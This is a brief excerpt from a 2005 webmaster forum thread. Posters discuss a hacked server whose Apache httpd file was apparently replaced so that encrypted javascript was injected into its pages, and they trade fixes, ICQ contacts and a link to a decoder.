01-27-2005, 02:20 PM	#40
V_RocKs Damn Right I Kiss Ass! Industry Role: Join Date: Dec 2003 Location: Cowtown, USA Posts: 32,409	You have been hacked. Someone has replaced your httpd file with their own. To quickly fix the problem, add a space to the end of your body tag: blah blah color=000000 > and it should go away. Next, have your host recompile and restart apache. Then get me on ICQ, 161124816

01-27-2005, 02:28 PM	#43
strongdong Confirmed User Join Date: Sep 2003 Posts: 191	V Rocks... I'm trying to contact you on icq, it's my server... 78861564

01-27-2005, 03:00 PM	#45
Rui web Join Date: Dec 2001 Location: On icq: 85-483-060 Posts: 9,533	Holy shit, that is indeed one nasty piece of code. punkworld - do you have experience in this area (encrypted javascript not trojans)?

01-27-2005, 03:20 PM	#47
Harmon ( ͡ʘ╭͜ʖ╮͡ʘ) Industry Role: Join Date: Mar 2004 Posts: 20,010	You can get your own standalone decoder here: http://www.programurl.com/software-s...wnloadnow.html __________________ [email protected]